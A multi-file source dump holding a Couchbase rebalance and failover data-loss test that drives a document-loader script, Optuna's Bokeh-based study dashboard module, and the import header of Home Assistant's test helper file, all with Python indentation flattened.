create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
self.sleep(5)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated=self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at, updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load*(updated-1),
batch=self.batch_size, instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc-self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances,
updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load*(updated-1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1),
batch=self.batch_size, instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
errors1=self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
errors2=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
if len(errors1) > 0 or len(errors2) > 0:
self.fail("data is missing");
def load_till_rebalance_progress(self, rest, bucket, total_doc, start_at):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master, b, self.reload_size,
self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
return total_doc, start_at
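# Same as load_till_rebalance_progress, but each pass also re-updates the initial
# document set and bumps the update counter.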
def create_update_till_rebalance_progress(self, rest, bucket, total_doc, start_at, updated):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
update_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master, b, self.reload_size,
self.batch_size, self.threads,
start_at, self.threads)))
update_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master, b, self.initial_load, self.initial_load,
self.batch_size, self.threads, 0, self.instances, updated)))
for t in load_thread:
t.start()
for th in update_thread:
th.start()
for t in load_thread:
t.join()
for th in update_thread:
th.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
updated += 1
return total_doc, start_at, updated
def shuffle_nodes_between_zones_and_rebalance(self, to_remove=None):
"""
Shuffle the nodes present in the cluster if zone > 1. Rebalance the nodes in the end.
Nodes are divided between groups round-robin, e.g. with zone=2 the 1st node goes to Group 1, the 2nd to Group 2, the 3rd to Group 1, and so on.
:param to_remove: List of nodes to be removed.
"""
if not to_remove:
to_remove = []
serverinfo = self.servers[0]
rest = RestConnection(serverinfo)
zones = ["Group 1"]
nodes_in_zone = {"Group 1": [serverinfo.ip]}
# Create zones, if not existing, based on params zone in test.
# Shuffle the nodes between zones.
if int(self.zone) > 1:
for i in range(1, int(self.zone)):
a = "Group "
zones.append(a + str(i + 1))
if not rest.is_zone_exist(zones[i]):
rest.add_zone(zones[i])
nodes_in_zone[zones[i]] = []
# Divide the nodes between zones.
nodes_in_cluster = [node.ip for node in self.get_nodes_in_cluster()]
nodes_to_remove = [node.ip for node in to_remove]
for i in range(1, len(self.servers)):
if self.servers[i].ip in nodes_in_cluster and self.servers[i].ip not in nodes_to_remove:
server_group = i % int(self.zone)
nodes_in_zone[zones[server_group]].append(self.servers[i].ip)
# Shuffle the nodes between the zones.
for i in range(1, self.zone):
node_in_zone = list(set(nodes_in_zone[zones[i]]) -
{node for node in rest.get_nodes_in_zone(zones[i])})
rest.shuffle_nodes_in_zones(node_in_zone, zones[0], zones[i])
otpnodes = [node.id for node in rest.node_statuses()]
nodes_to_remove = [node.id for node in rest.node_statuses() if node.ip in [t.ip for t in to_remove]]
# Start rebalance and monitor it.
started = rest.rebalance(otpNodes=otpnodes, ejectedNodes=nodes_to_remove)
if started:
result = rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
# Verify that a node's replica vbuckets do not end up in the same zone as its active vbuckets.
if self.zone > 1:
self._verify_replica_distribution_in_zones(nodes_in_zone)
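# Run the external scripts/thanosied.py loader to update documents and assert that
# the total it reports equals the requested number of operations.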
def update_buckets_with_high_ops(self, server, bucket, items, ops,
batch=20000, threads=5, start_document=0,
instances=1,update_counter=1):
import subprocess
#cmd_format = "python3 scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {" \
# "9} --ops {10} --updates --update_counter {11}"
cmd_format = "python3 scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --rate_limit {10} " \
"--passes 1 --update_counter {11}"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 1:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
items, batch, threads, start_document,
cb_version, instances, int(ops), update_counter)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Decode the subprocess output so the string parsing below works under Python 3.
output = result.stdout.read().decode('utf-8')
error = result.stderr.read().decode('utf-8')
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, ops,
"Failed to update {} items. Loaded only {} items".format(
ops,
total_loaded))
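# Run scripts/thanosied.py to create documents and assert that the total it reports
# equals the requested item count.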
def load_buckets_with_high_ops(self, server, bucket, items, batch=20000, threads=10, start_document=0, instances=1
,ttl=0):
import subprocess
#cmd_format = "python3 scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {9} --ttl {10}"
cmd_format = "python3 scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --ttl {10}" \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 0 and self.use_replica_to:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username, server.rest_password, items, batch,
threads, start_document, cb_version, instances, ttl)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Decode the subprocess output so the string parsing below works under Python 3.
output = result.stdout.read().decode('utf-8')
error = result.stderr.read().decode('utf-8')
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, items,
"Failed to load {} items. Loaded only {} items".format(items, total_loaded))
def load_docs(self, bucket,num_items=0, start_document=0):
if self.loader == "pillowfight":
load_thread = Thread(target=self.load,
name="pillowfight_load",
args=(self.master, self.num_items, self.batch_size, self.doc_size, self.rate_limit))
return load_thread
elif self.loader == "high_ops":
if num_items == 0:
num_items = self.num_items
load_thread = Thread(target=self.load_buckets_with_high_ops,
name="high_ops_load",
args=(self.master, bucket, num_items, self.batch_size,
self.threads, start_document, self.instances))
return load_thread
def check_data(self, server, bucket, num_items=0):
if self.loader == "pillowfight":
return self.check_dataloss(server, bucket, num_items)
elif self.loader == "high_ops":
return self.check_dataloss_for_high_ops_loader(server, bucket, num_items)
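# Run the thanosied.py loader in validation mode and turn any "Missing keys" /
# "Mismatch keys" lines in its output into error strings tagged with the owning
# vBucket id.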
def check_dataloss_for_high_ops_loader(self, server, bucket, items,
batch=2000, threads=5,
start_document=0,
updated=False, ops=0,instances=1):
import subprocess
from lib.memcached.helper.data_helper import VBucketAwareMemcached
#cmd_format = "python3 scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} " \
# "--batch_size {5} --instances {9} --threads {6} --start_document {7} --cb_version {8} --validate"
cmd_format = "python3 scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --validation 1 " \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if updated:
cmd_format = "{} --updated --ops {}".format(cmd_format, int(ops))
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
int(items), batch, threads, start_document, cb_version, instances)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Decode the subprocess output so the string parsing below works under Python 3.
output = result.stdout.read().decode('utf-8')
error = result.stderr.read().decode('utf-8')
errors = []
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
if error:
self.log.error(error)
self.fail("Failed to run the loadgen validator.")
if output:
loaded = output.split('\n')[:-1]
for load in loaded:
if "Missing keys:" in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append(
("Missing key: {0}, VBucketId: {1}".format(key, vBucketId)))
if "Mismatch keys: " in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append((
"Wrong value for key: {0}, VBucketId: {1}".format(
key, vBucketId)))
self.log.info("Total number of missing doc:{}".format(len(errors)))
self.log.info("Missing/Mismatch keys:{}".format(errors))
return errors
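# Reproducer: load until the bucket holds at least 1.2M items, rebalance in one
# node, then validate the full key space.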
def test_volume_with_high_ops_reproduce(self):
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
stats_dst = rest.get_bucket_stats()
while stats_dst["curr_items"] < 1200000:
self.sleep(300)
stats_dst = rest.get_bucket_stats()
# Rebalance in 1 node
servers_init = self.servers[:self.nodes_init]
# Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in = self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, self.num_items, instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
import optuna.logging
import optuna.structs
import optuna.study
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials
if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field)
for field in [
'trial_id',
'state',
'value',
'params',
'datetime_start',
'datetime_complete'
]
]
)
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {
k: list(zip(modified_indices, v))
for k, v in patch_dict.items()
}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'trial_id': [trial.trial_id for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start':
[trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None
for trial in trials],
'datetime_complete':
[trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None
for trial in trials],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(
study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([
[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]
], sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = 'serve'
_study = study
    # TODO(akiba): Stop using Bokeh's CLI entry point and start the HTTP server ourselves.
    # This is not a very clean way to launch a Bokeh server. A seemingly better way would be
    # to instantiate and launch `bokeh.server.server.Server` ourselves. However, when we did
    # that, CDS updates were not reflected in browsers, at least on Bokeh version 0.12.15.
    # In addition, we would have to configure the server in many ways that the single line
    # below handles automatically. So, for now, we use the CLI entry point.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
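# Editorial usage sketch (not part of the original module); the storage URL and
# study name below are hypothetical placeholders.
def _example_usage():
    # type: () -> None
    import optuna
    study = optuna.create_study(storage='sqlite:///example.db', study_name='example')
    serve(study)  # launch a Bokeh server and open the dashboard in a browser
    # Alternatively, render the dashboard to a static HTML file:
    # write(study, 'dashboard.html')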
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
